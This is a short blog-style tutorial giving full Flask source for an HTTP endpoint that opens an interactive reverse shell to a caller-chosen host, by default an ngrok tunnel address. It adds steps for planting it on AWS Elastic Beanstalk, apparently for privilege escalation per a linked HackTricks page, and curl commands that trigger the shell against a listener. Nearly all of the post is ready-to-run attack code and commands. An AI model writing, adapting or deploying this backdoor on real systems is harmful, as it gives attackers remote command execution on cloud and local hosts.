A Simple Reverse Shell in Flask

This post contains a Reverse Shell. This would be useful to execute system commands in Flask Applications.

Execute Reverse Shell

Create a file named requirements.txt

Flask

Create a file named application.py

from flask import Flask, request
import socket
import subprocess
import os

application = Flask(__name__)

@application.route('/reverse_shell', methods=['GET'])
def reverse_shell():
    try:
        # Get connection details from the GET request
        host = request.args.get('host', '0.tcp.ap.ngrok.io')
        port = int(request.args.get('port', '18996'))

        # Create socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))

        # Redirect stdin, stdout, stderr to the socket
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)

        # Run interactive shell
        subprocess.call(["/bin/sh", "-i"])

        return "Shell executed", 200
    except Exception as e:
        return str(e), 500

if __name__ == "__main__":
    # Use the following if you're upload to Elastic BeanStalk or other such container
    application.run(debug=True)
    # Use the following for local Testing
    # application.run(host='0.0.0.0', port=5000)
    

Execute From Elastic Beanstalk

Modify the Host and Port from the reverse shell application.py to get shell in your listener. If publishing to Elastic BeanStalk you will automatically get a Shell, if configured the Host and Port of you listener properly.

Else The Reverse Shell can be executed, by sending the following GET request with your desired listener Host and Port

curl "http://<your-elastic-beanstalk-URL>/reverse_shell?host=0.tcp.ap.ngrok.io&port=18996"

More Info:

https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-s3-write-permissions–many-others

https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/python-quickstart.html

From Local Setup for Testing

Make changes to the Last Line as below to run on local server port 5000

# Use the following if you're upload to Elastic BeanStalk or other such container
    # application.run(debug=True)
    # Use the following for local Testing
     application.run(host='0.0.0.0', port=5000)

Then run the following command from the same folder where the application.py and requirments.txt file exist to start the Flask server with the reverse shell.

# export FLASK_APP=application.py && flask run --port 5000
 * Serving Flask app 'application.py'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit

And start your listener and execute the following URL, depending your listener host and port.

curl "http://127.0.0.1:5000/reverse_shell?host=127.0.0.1&port=4444"